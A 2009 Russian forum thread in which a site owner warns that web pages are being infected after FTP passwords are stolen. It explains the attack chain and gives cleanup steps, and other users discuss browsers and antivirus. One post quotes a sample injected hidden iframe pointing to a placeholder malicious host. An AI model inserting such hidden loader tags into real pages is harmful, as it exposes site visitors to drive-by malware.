Вниманию владельцев сайтов - ВИРУСЫ!!!

Посвещается техническому прогрессу. Авто, мото, вело, фото, оружие и т.д....

Модераторы: Евгений, Varvar, kinolog, kam

Аватара пользователя
Бондарьков Е. В.
мастер провокаций
Сообщения: 475
Зарегистрирован: Чт июн 12, 2008 6:55 pm
Откуда: Выгнали отовсюду? Сам ушел.
Контактная информация:

Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение Бондарьков Е. В. » Пт янв 23, 2009 11:33 am

Сегодня ночью главная страница сайта КЦ "Ясеневый" www.yasenevo-dog.ru была заражена вирусом. Я уже все исправил. Это не первый подобный случай, с которым я сталкиваюсь.
Уважаемые владельцы сайтов, будьте осторожны! Не сохраняйте пароли от FTP на компьютерах! Вирус действует следующим образом. Если вы заходите на зараженный сайт (НЕ ХОДИТЕ ПО НЕИЗВЕСТНЫМ ССЫЛКАМ), на ваш компьютер попадает вирус, который собирает сохраненные на компьютере пароли от сайтов и отправляет их своему владельцу. Потом по сайтам ходит бот, который вставляет в HTML-код (как правило главных страниц) дескрипторы (теги) <iframe> и <script> содержащие ссылки на вирус.

PS Варвара, что с Dogschool?

Аватара пользователя
kinolog
МОДЕРАТОР
МОДЕРАТОР
Сообщения: 4359
Зарегистрирован: Ср июн 04, 2008 10:07 am
Откуда: Москва
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение kinolog » Пт янв 23, 2009 11:41 am

Женя, расскажи подробно, каким образом действует эта зараза и чего точно не нужно никогда делать?
Изображение

Аватара пользователя
Бондарьков Е. В.
мастер провокаций
Сообщения: 475
Зарегистрирован: Чт июн 12, 2008 6:55 pm
Откуда: Выгнали отовсюду? Сам ушел.
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение Бондарьков Е. В. » Пт янв 23, 2009 11:50 am

Вот что писали мне специалисты, когда я в прошлый раз столкнулся с такой проблемой.
В тот раз, вероятно, по неизвестной ссылке зашел ребенок, которого мама по неосмотрительности пускала за компьютер, с которого работала по FTP, и на котором был сохранен пароль. Пароль от того сайта был и у меня.

Происходит это следующим образом:

* вирус попадает на компьютер, на котором хранятся логины и пароли
доступа по FTP на какие-либо серверы. Чаще всего это происходит при
заходе на уже зараженный сайт уязвимой версией Internet Explorer.
* вирус собирает логины/пароли и отсылает их на сервер,
контролируемый взломщиками, с которого потом робот заходит на сайты по
FTP и вставляет вирусный код во все файлы index.php и index.html,
которые найдет. Как правило, этот код содержит HTML тег <iframe> или
реализован через JavaScript. Пример: <iframe
src='http://xxxxxxxxx.info' width='1' height='1' style='visibility:
hidden;'></iframe>

Что в этой ситуации делать:

1. удалить вирусы со всех компьютеров, на которых хранятся логины на FTP
2. установить все доступные "заплатки" для вашей версии браузера
3. поменять пароли на FTP, по возможности вообще не запоминать их в
настройках FTP-клиентов
4. восстановить все поврежденные индексные файлы index.php,
index.html, index.htm и т.п. Возможно, заражены не только они, надо
проверить и остальные тоже. Учтите, что пока не выполнены действия из
пп. 1-3, проблема не исчезнет, сайт будет заражаться снова и снова. Если
был поврежден контент сайта, обращайтесь в службу технической поддержки
для развертывания резервной копии.

Зараженных сайтов много во всем интернете, поэтому при работе с
браузерами, содержащими уязвимости, заражение практически гарантировано.

Аватара пользователя
kinolog
МОДЕРАТОР
МОДЕРАТОР
Сообщения: 4359
Зарегистрирован: Ср июн 04, 2008 10:07 am
Откуда: Москва
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение kinolog » Пт янв 23, 2009 12:08 pm

Хорошо, а какие рекомендации по использованию браузеров? Неужели IE такой легко проникаемый. И что можете порекомендовать использовать в связи с этим.
Изображение

Аватара пользователя
Бондарьков Е. В.
мастер провокаций
Сообщения: 475
Зарегистрирован: Чт июн 12, 2008 6:55 pm
Откуда: Выгнали отовсюду? Сам ушел.
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение Бондарьков Е. В. » Пт янв 23, 2009 12:16 pm

Не возьмусь давать советы, но приведу статистику по посетителям сайта КЦ "Ясеневый" за последний месяц:

Microsoft Internet Explorer 7.xx - 31,2%
Microsoft Internet Explorer 6.xx - 29,5%
FireFox 3.xx - 18,0%
Opera 9.xx - 14,6%
FireFox 2.xx - 4,1%
FireFox 1.xx - 0,7%
Mozilla 1.xx - 0,7%
Chrome 1.xx - 0,4%
Opera 8.xx - 0,4%
Safari 3.xx - 0,4%

Аватара пользователя
kinolog
МОДЕРАТОР
МОДЕРАТОР
Сообщения: 4359
Зарегистрирован: Ср июн 04, 2008 10:07 am
Откуда: Москва
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение kinolog » Пт янв 23, 2009 12:20 pm

На самом деле IE очень популярный браузер. Это бесспорно.
Microsoft регулярно выпускает заплатки. Надо вовремя делать обновления и пользоваться антивирусными системами..
Изображение

Аватара пользователя
Бондарьков Е. В.
мастер провокаций
Сообщения: 475
Зарегистрирован: Чт июн 12, 2008 6:55 pm
Откуда: Выгнали отовсюду? Сам ушел.
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение Бондарьков Е. В. » Пт янв 23, 2009 12:23 pm

kinolog писал(а):На самом деле IE очень популярный браузер. Это бесспорно.


Вот поэтому вирусы пишут именно под него ]:->

Аватара пользователя
XPOHABT
Осваивающийся
Осваивающийся
Сообщения: 22
Зарегистрирован: Пт июн 06, 2008 6:50 pm
Откуда: Владивосток

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение XPOHABT » Пт янв 23, 2009 12:55 pm

А где в списке MyIE2 ???
На всякий случай - это прадедушка Maxthon'a

Аватара пользователя
TrP
Начинающий
Начинающий
Сообщения: 8
Зарегистрирован: Чт сен 18, 2008 10:19 am
Откуда: Moscow
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение TrP » Пт янв 23, 2009 4:40 pm

Первый раз слышу чтоб администраторы ходили на фтп сайтов через иё подобные браузеры да и просто браузеры ) Юзайте фтп клиенты, а если ходите на вьёб админки с иё и т.д. то не надо сохранять пароли в кеше.
Изображение

Аватара пользователя
Бондарьков Е. В.
мастер провокаций
Сообщения: 475
Зарегистрирован: Чт июн 12, 2008 6:55 pm
Откуда: Выгнали отовсюду? Сам ушел.
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение Бондарьков Е. В. » Пт янв 23, 2009 9:07 pm

Через браузеры ходят не на FTP, а на зараженные сайты, где подхватывают вирусы, собирающие пароли с FTP-клиентов.

Аватара пользователя
kinolog
МОДЕРАТОР
МОДЕРАТОР
Сообщения: 4359
Зарегистрирован: Ср июн 04, 2008 10:07 am
Откуда: Москва
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение kinolog » Пт янв 23, 2009 9:32 pm

Интересно, а в течение которого времени этот процесс происходит.
То есть, если я зашел на зараженный сайт, то СРАЗУ надо СУШИТЬ ВЕСЛА или есть шанс, что всё может обойтись, и антивирусник справиться?
Изображение

Аватара пользователя
TrP
Начинающий
Начинающий
Сообщения: 8
Зарегистрирован: Чт сен 18, 2008 10:19 am
Откуда: Moscow
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение TrP » Пн янв 26, 2009 12:26 pm

kinolog писал(а):Интересно, а в течение которого времени этот процесс происходит.
То есть, если я зашел на зараженный сайт, то СРАЗУ надо СУШИТЬ ВЕСЛА или есть шанс, что всё может обойтись, и антивирусник справиться?

Смотря какой антивирусник =))) и ваще чтоб не цеплять всякое Г по незнакомым зонам инета ходите осторожнее Не надо жать на всякие левые банеры и ходить по ссылкам которые вам кидает хз кто в асю или чат, даже если ссылку вам кинул друг в асю переспросите он ли её кинул, возможно ссылки рассылает бот после взлома аси вашего друга, не открывайте и не запускайте файлы не знакомые вам Будте бдительны и никакие вирусы вам не страшны. И не забывайте обновлять вирусные базы ваших антивирусников.

И если вы используете машину для админства не надо допускать к этим машинам детей ))) парольте все к чертовой бабушке
Изображение

Аватара пользователя
kinolog
МОДЕРАТОР
МОДЕРАТОР
Сообщения: 4359
Зарегистрирован: Ср июн 04, 2008 10:07 am
Откуда: Москва
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение kinolog » Пн янв 26, 2009 12:39 pm

Спасибо за разъяснения.
Изображение

Аватара пользователя
maeglin
Наш человек
Наш человек
Сообщения: 247
Зарегистрирован: Сб июн 07, 2008 11:33 am
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение maeglin » Пн янв 26, 2009 9:09 pm

nod32 у меня эту тварь не нашел, аваст вроде бы нашел. Посмотрим...

Аватара пользователя
kinolog
МОДЕРАТОР
МОДЕРАТОР
Сообщения: 4359
Зарегистрирован: Ср июн 04, 2008 10:07 am
Откуда: Москва
Контактная информация:

Re: Вниманию владельцев сайтов - ВИРУСЫ!!!

Сообщение kinolog » Пн янв 26, 2009 9:16 pm

maeglin
Твой сайт заработал. Ура!!!
Изображение


Вернуться в «21 век и его технологии.»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость